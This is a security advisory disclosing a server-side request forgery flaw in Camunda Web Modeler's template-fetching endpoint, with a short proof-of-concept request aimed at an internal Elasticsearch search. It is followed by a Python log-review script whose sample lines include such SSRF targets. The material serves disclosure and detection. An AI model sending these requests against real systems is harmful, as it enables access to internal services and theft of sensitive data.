Advisory ID:               SYSS-2025-040
Product:                   Camunda Web Modeler
Manufacturer:              Camunda Services GmbH
Affected Version(s):       8.5, 8.6, 8.7
Tested Version(s):         8.6.3
Vulnerability Type:        Server-Side Request Forgery (CWE-918)
Risk Level:                High
Solution Status:           Fixed
Manufacturer Notification: 2025-05-28
Solution Date:             2025-08-19
Public Disclosure:         2025-08-27
CVE Reference:             Not yet assigned
Author of Advisory:        Nicola Staller, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

Camunda Web Modeler is a web-based application for process modeling.

The manufacturer describes the product as follows (see [1]):

"Modeler is our visual design tool that empowers both low-code and
pro-code users to design, collaborate on, and implement end-to-end
processes in Camunda. By building with open standards like BPMN and DMN,
business and IT are aligned through a shared model, common language, and
a unified approach to process development. Combine this with the
flexibility to work in the way that fits your team, and you get better,
more efficient workflows, delivered faster."

Because it trusts client-provided data, Web Modeler is vulnerable to
server-side request forgery (SSRF).

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

Web Modeler allows loading templates in the template marketplace.
When such a template is loaded, a request containing a user-controlled
URL is issued. Modifying this URL allows attacks on other systems.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

Issue a request from an authenticated user context to the URL
https:///fetch-resources?url=https:// and observe that the server tries
to fetch resources from the specified server.

Depending on the configured environment, it may even be possible to
access internal systems such as an Elasticsearch endpoint and fetch
sensitive information from it:

GET /fetch-resources?url=http://://_search HTTP/2
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Authorization: Bearer

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

The fix for this vulnerability has been backported to Camunda 8.5, 8.6,
and 8.7. Ensure that a patched version is in use.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2025-05-23: Vulnerability discovered
2025-05-28: Vulnerability reported to manufacturer
2025-08-19: Patch released by manufacturer
2025-08-27: Public disclosure of vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for Camunda Modeler
    https://camunda.com/en/platform/modeler/
[2] SySS Security Advisory SYSS-2025-040
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2025-040.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Nicola Staller of SySS GmbH.

E-Mail: nicola.staller@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Nicola_Staller.asc
Key ID: 0x41DD2290
Key Fingerprint: A127 394A F398 B097 2332 637C 9DF3 39F9 41DD 2290

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS
website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 4.0
URL: https://creativecommons.org/licenses/by/4.0/deed.en
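
Added example (not part of the SySS advisory and not Camunda's code): a Python log check that finds /fetch-resources requests whose url parameter points anywhere other than the expected template host, for reviewing access logs from the period before patching. The allowlisted host marketplace.example, the combined-log line layout and the sample lines are assumptions constructed for illustration.

```python
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

# Assumption: the only host templates are legitimately fetched from (placeholder).
ALLOWED_HOSTS = {"marketplace.example"}
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# Constructed access-log lines (combined-log style), not taken from a real system.
SAMPLE_LOG = [
    '203.0.113.7 - alice [27/Aug/2025:10:00:01 +0000] "GET /fetch-resources?url=https%3A%2F%2Fmarketplace.example%2Ft.json HTTP/2.0" 200 512',
    '203.0.113.7 - bob [27/Aug/2025:10:02:13 +0000] "GET /fetch-resources?url=http://10.0.0.5:9200/_search HTTP/2.0" 200 9120',
    '203.0.113.9 - bob [27/Aug/2025:10:02:40 +0000] "GET /fetch-resources?url=https://files.example.net/x HTTP/2.0" 200 88',
    '203.0.113.9 - carol [27/Aug/2025:10:04:00 +0000] "GET /projects HTTP/2.0" 200 100',
]

def classify_target(target):
    """Return 'ok' or the reason a fetch-resources target needs triage."""
    try:
        parts = urlsplit(target)
        host = (parts.hostname or "").lower()  # parsed host, not the raw string
    except ValueError:
        return "unparseable url"
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        ip = None
    if ip is not None:
        internal = ip.is_private or ip.is_loopback or ip.is_link_local
        return "internal address" if internal else "ip literal"
    if parts.scheme != "https":
        return "non-https scheme"
    return "ok" if host in ALLOWED_HOSTS else "host not allowlisted"

def suspicious_fetches(log_lines):
    """Return (line_no, target, reason) for each flagged fetch-resources request."""
    findings = []
    for no, line in enumerate(log_lines, 1):
        match = REQUEST_RE.search(line)
        request = urlsplit(match.group(1)) if match else None
        if request is None or request.path != "/fetch-resources":
            continue
        # parse_qs percent-decodes the value, so encoded targets are compared too.
        for target in parse_qs(request.query).get("url", []):
            reason = classify_target(target)
            if reason != "ok":
                findings.append((no, target, reason))
    return findings

if __name__ == "__main__":
    print(*suspicious_fetches(SAMPLE_LOG), sep="\n")
```

The check does not resolve DNS names, so a hostname that resolves to an internal address is reported only as "host not allowlisted".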